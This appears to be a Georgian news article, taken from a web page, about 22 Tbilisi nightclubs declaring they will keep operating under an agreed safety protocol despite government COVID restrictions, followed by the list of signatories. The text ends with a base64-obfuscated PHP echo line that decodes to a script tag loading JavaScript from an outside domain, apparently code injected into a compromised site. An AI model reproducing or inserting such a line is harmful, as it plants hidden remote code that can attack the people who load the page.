celsiusi
ავერსი შნაიდერი
თბილისის ელექტრონული მუსიკისა და საკლუბო სცენის წარმომადგენლები აცხადებენ, რომ ღამის კლუბებზე დაწესებული შეზღუდვების მიუხედავად მუშაობას დადგენილი პროტოკოლით გააგრძელებენ. ამის შესახებ ისინი გუშინ, 22 დეკემბერს გავრცელებულ განცხადებაში წერენ, რომელსაც 22 კლუბი აწერს ხელს.
 
აღნიშნულ განცხადებას წინ უძღოდა უწყებათაშორის საკოორდინაციო საბჭოსთან არსებული ოპერაციული შტაბის უფროსის გიორგი ღიბრაძის განცხადება, რომლის თანახმადაც საკოორდინაციო საბჭოს კლუბების გახსნის გადაწყვეტილება არ მიუღია.
 
საკლუბო სფეროს წარმომადგენლები განცხადებაში აღნიშნავენ, რომ ისინი 22-თვიანი ლოდინის შემდეგ სწორედ გუშინ, 22 დეკემბერს ელოდნენ საკოორდინაციო საბჭოს გადაწყვეტილებას კლუბების გახსნაზე.
 
“ამ უსამართლო და უთანასწორო ნაბიჯმა, განადგურების საფრთხის წინაშე დააყენა მთელი სცენა და მასთან ერთად, ამ სფეროში დასაქმებული 8000-მდე ადამიანის მომავალი. ვწუხვართ, რომ გვჯეროდა და კიდევ ერთხელ აღმოვჩნდით მწარედ მოტყუებულები.
 
სამწუხაროდ, ჩვენ არ გვაქვს იმის ფუფუნება, რომ მშვიდად ვუყუროთ ერთი მხრივ ხალხზე ზრუნვის მოტივით, როგორ ანადგურებს ხელისუფლება ჩვენს სფეროს, რომლის წარმატებამ და გლობალური მასშტაბით აღიარებამ ქვეყანას უპრეცედენტო საერთაშორისო მნიშვნელობა შესძინა, მეორე მხრივ კი თავად აორგანიზებს კონცერტებსა და ხალხმრავალ შეკრებებს”, – ნათქვამია კლუბების წარმომადგენლების განცხადებაში.
 
განცხადებაში ასევე აღნიშნულია, რომ სახელმწიფომ ღამის კლუბებს “მუქარის ენით” ელაპარაკება, კერძოდ, ამბობს, რომ გამოიყენებს ფინანსურ სანქციებს და სისხლის სამართლის პასუხისმგებლობას. თუმცა ამის მიუხედავად, კლუბები დადგენილი პროტოკოლით მუშაობის გაგრძელებას გეგმავენ:
 
“მიუხედავად დაშინებისა, რომ ჩვენს წინააღმდეგ გამოყენებული იქნება ფინანსური სანქციები და სისხლის სამართლის პასუხისმგებლობა, თბილისის ელექტრონული მუსიკისა და საკლუბო სცენის უკლებლივ ყველა წარმომადგენელმა, მივიღეთ ერთიანი გადაწყვეტილება – თბილისის კლუბები გააგრძელებენ მუშაობას იმ დადგენილი პროტოკოლის მიხედვით, რომელიც შეთანხმებულია შესაბამის უწყებებთან, რომლის მოსამზადებლად ბევრი ვიშრომეთ და ისედაც უმძიმეს მდგომარეობაში მყოფებს დამატებით უზარმაზარი ფინანსური ხარჯის გაღება მოგვიწია. ჩვენ არ ნებდებით, ვაპირებთ ბრძოლას”, – ნათქვამია განცხადებაში.
 
ამასთან, კლუბების განცხადებით, გახსნისგან თავს ეპიდემიოლოგიური მდგომარეობის გათვალისწინებით იკავებდნენ, თუმცა ამ პერიოდის განმავლობაში შეიმუშავეს ცოდნაზე, გამოცდილებასა და კვლევაზე დაფუძნებული უსაფრთხო ღონისძიებების იდეა და სახელმძღვანელო დოკუმენტი, რომელიც ღია და დახურულ სივრცეებში ხალხმრავალი ღონისძიების დროს ვირუსის გავრცელების რისკების მინიმუმამდე დაყვანას ისახავს მიზნად. მათ თქმით, სწორედ ამ დოკუმენტზე დაყრდნობით ითხოვენ მუშაობის განახლებას.
 
განცხადებას ხელს აწერს:
 
The Cultural and Creative Industries Union of Georgia
4GB
BASSIANI
Boom Boom Booking Agency
Bude
CAFE-GALLERY
Colibri
DAISI • დაისი
დედაენის ბარი
KHIDI
Kibe
Left Bank
Lisi Rest
Lisi Wood
MIONI
Millennials
მტკვარზე • MTKVARZE
Mzesumzira
რეფლექტორი / Reflector
Swing Festival
TES
TIVI • ტივი “
913
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");